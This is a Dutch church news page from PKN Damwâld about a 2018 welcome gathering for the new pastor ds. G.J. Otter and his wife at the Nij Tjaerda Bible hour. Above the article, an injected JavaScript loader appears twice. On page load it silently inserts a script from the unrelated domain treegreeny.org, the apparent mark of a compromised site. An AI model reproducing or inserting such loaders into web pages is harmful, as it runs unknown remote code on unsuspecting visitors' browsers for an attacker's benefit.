;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kennismaking met ds. G.J. Otter en echtgenote … gezellige drukte in Nij Tjaerda! - PKN Damwâld

Kennismaking met ds. G.J. Otter en echtgenote … gezellige drukte in Nij Tjaerda!

Gepubliceerd op: dinsdag 12 juni 2018

De tweede dinsdag van de maand, 09.30 uur in Nij Tjaerda … normaliter hét tijdstip voor een leerzaam, onderhoudend Bijbeluurtje. Ook nu was de grote zaal gevuld met bewoners en omwonenden  van Nij Tjaerda, maar nu voor een genoeglijke kennismaking met ds. G.J. Otter en zijn echtgenote. Het werd een feestelijk gebeuren. Na de opening met een prachtig gedicht en gebed door ouderlinge Fokje de Boer volgde een warm welkomswoord van mw. Haagsma. Hierin wenste zij namens de deelnemers van het Bijbeluurtje het gezin Otter een snelle ‘inburgering’ en een fijn verblijf in Damwâld toe. Tevens wenste zij ds. Otter een goede gezegende tijd toe in het kerkenwerk en sprak richting hem een hartelijke uitnodiging uit voor de nodige inspirerende, verrassende en verrijkende Bijbeluurtjes. Ds. Otter, die met een korte meditatie vanuit Handelingen 3 alvast vooruitblikte naar de preek van komende zondagmorgen – we verklappen hier niets, de dienst begint om 09.30 uur in de Bonifatiuskerk in Damwâld –  stelde daarna zichzelf en zijn gezin voor. Gezien de ‘Fryske komôf’ van ds. Otter met daarbij de nodige familieverbanden werd het een feest van herkenning en enige aanwezigen herinnerden zich ds. Otter nog als driejarige peuter in het ‘Dokkumse’.  Uiteraard werd er ook nog gezongen … uit het hoofd en a capella … onder andere het prachtige en toepasselijke ‘Grote God wij loven U’.

Het Bijbeluurtje … een waardevolle, gezellige en onderhoudende ontmoeting in Zijn naam. Op 11 september om half tien bent u weer welkom in Nij Tjaerda voor het vergroten van uw algemene kennis van de Bijbel, het leren toepassen van Gods Woord in uw persoonlijk leven, het bidden voor de gemeente en de wereld om ons heen en het groeien in uw persoonlijk geloof. U bent van harte welkom !